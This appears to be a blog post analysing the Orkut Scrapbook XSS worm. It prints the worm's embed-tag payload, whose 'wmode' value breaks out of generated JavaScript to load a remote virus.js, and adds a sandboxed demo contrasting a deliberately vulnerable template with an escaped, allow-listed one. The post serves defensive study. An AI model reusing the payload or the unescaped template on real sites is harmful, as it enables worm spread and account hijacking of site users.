I said in my previous post that the XSS flaw that caused the "infection" of about 660 000 Orkut profiles was probably present in the way Orkut parsed Flash objects.
Analysis of the worm showed that this is in fact the case. More specifically, there was a bug in the parsing of at least one of the attributes of the 'embed' HTML tag, a tag that Orkut allowed along with others. What follows are the technical details.
The malicious code that the worm was sending to Orkut's Scrapbook system was the following:
```html
<embed src="http://www.orkut.com/LoL.aspx" type="application/x-shockwave-flash" wmode=\"transparent'); script=document.createElement('script');
script.src='http://files.myopera.com/virusdoorkut/files/virus.js';
document.getElementsByTagName('head')[0].appendChild(script); escape('" width="1" height="1"></embed>
```
This code is supposed to insert a Flash object. The malicious part starts after "wmode". 'transparent' is a valid value for the "wmode" attribute, but the value is not supposed to contain characters such as "');". Google should have stripped them out entirely. Why? Because Google transforms this HTML into JavaScript that inserts the Flash object, and the attribute value is spliced into that JavaScript as-is:
```javascript
// ...
var flashWriter = new _SWFObject('http://www.orkut.com/LoL.aspx', '521601098', '1', '1', '9', '#FFFFFF', 'autohigh', '', '', '521601098');
flashWriter._addParam('wmode', 'transparent');
script=document.createElement('script');
script.src='http://files.myopera.com/virusdoorkut/files/virus.js';
document.getElementsByTagName('head')[0].appendChild(script); escape('');
flashWriter._addParam('allowNetworking', 'internal');
// ...
```
What should have been stripped was inserted into the script verbatim. The "');" that followed 'transparent' closed the string literal and the "_addParam" call, so everything after it ran as ordinary script: the three lines that create a script element, point it at virus.js and append it to the document head. The trailing "escape('" at the end of the attribute value absorbs the "');" that Orkut's template appends after the parameter, which keeps the generated script syntactically valid.
Any code or script could have been loaded by the attacker at this point. The file on Opera's server is the worm's code; it now returns a 403 Forbidden error. No other files were used.
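The following is an added example, not Orkut's code: it models a server-side template that splices 'embed' attribute values straight into the JavaScript it emits, runs the generated script against a stand-in `_SWFObject` and DOM to show the worm's 'wmode' value being executed, and contrasts it with a hardened template that allow-lists 'wmode' and escapes 'src'. The `_SWFObject` constructor, the `document` stub, the template text and the `WORM_WMODE` string are all constructed here from the snippets quoted above and are assumptions, not Orkut's actual implementation.

```javascript
// Stand-ins for _SWFObject and the DOM, so the generated script can be
// executed offline and its side effects (params set, scripts loaded) observed.
// These are assumptions modelled on the snippet quoted in the post.
function makeSandbox() {
  const state = { objects: [], params: [], loaded: [] };
  function _SWFObject(src) { state.objects.push(src); }
  _SWFObject.prototype._addParam = function (name, value) {
    state.params.push([name, value]);
  };
  const document = {
    createElement: () => ({}),
    getElementsByTagName: () => [{ appendChild: (el) => state.loaded.push(el.src) }],
  };
  // new Function bodies are sloppy-mode, so the worm's undeclared "script="
  // assignment works exactly as it would in a browser's inline script.
  state.run = (script) => {
    new Function('_SWFObject', 'document', script)(_SWFObject, document);
    return state;
  };
  return state;
}

// Vulnerable template: attribute values are concatenated into the script
// unescaped, which is what the output quoted in the post implies Orkut did.
function renderVulnerable(src, wmode) {
  return (
    "var flashWriter = new _SWFObject('" + src + "', '521601098', '1', '1', '9', '#FFFFFF', 'autohigh', '', '', '521601098');\n" +
    "flashWriter._addParam('wmode', '" + wmode + "');\n" +
    "flashWriter._addParam('allowNetworking', 'internal');\n"
  );
}

// Turn an arbitrary string into a JavaScript string literal that can only ever
// be data. JSON.stringify escapes quotes, backslashes and control characters;
// the extra replacements cover '<' (so "</script>" cannot close the script tag)
// and the two line terminators that JSON allows but JS string literals may not.
function jsStringLiteral(s) {
  return JSON.stringify(String(s))
    .replace(/</g, '\\u003c')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

// Hardened template: wmode is an enumerated attribute, so it is allow-listed
// outright; src is free-form, so it is escaped. Returns null on rejection.
const WMODE_ALLOWED = new Set(['window', 'opaque', 'transparent']);
function renderHardened(src, wmode) {
  if (!WMODE_ALLOWED.has(wmode)) return null;
  return (
    'var flashWriter = new _SWFObject(' + jsStringLiteral(src) + ", '521601098', '1', '1', '9', '#FFFFFF', 'autohigh', '', '', '521601098');\n" +
    "flashWriter._addParam('wmode', " + jsStringLiteral(wmode) + ');\n' +
    "flashWriter._addParam('allowNetworking', 'internal');\n"
  );
}

// The worm's wmode attribute value, reconstructed from the post (constructed input).
const WORM_WMODE =
  "transparent'); script=document.createElement('script'); " +
  "script.src='http://files.myopera.com/virusdoorkut/files/virus.js'; " +
  "document.getElementsByTagName('head')[0].appendChild(script); escape('";

function demo() {
  const vulnerable = makeSandbox().run(renderVulnerable('http://www.orkut.com/LoL.aspx', WORM_WMODE));
  const rejected = renderHardened('http://www.orkut.com/LoL.aspx', WORM_WMODE);
  // Same payload moved into src, which cannot be allow-listed: escaping keeps it data.
  const escaped = makeSandbox().run(renderHardened(WORM_WMODE, 'transparent'));
  return {
    vulnerableLoaded: vulnerable.loaded,   // the virus.js URL was fetched
    hardenedRejected: rejected === null,   // allow-list refused the wmode value
    escapedLoaded: escaped.loaded,         // nothing loaded
    escapedSrc: escaped.objects[0],        // payload arrived verbatim as a plain string
  };
}

if (typeof require !== 'undefined' && require.main === module) console.log(demo());
```

The sandbox records what the generated script does rather than inspecting its text, which is the check worth making: the vulnerable template yields a script that appends virus.js to the document head, while the hardened one either rejects the value or hands the whole payload to `_SWFObject` as one inert string.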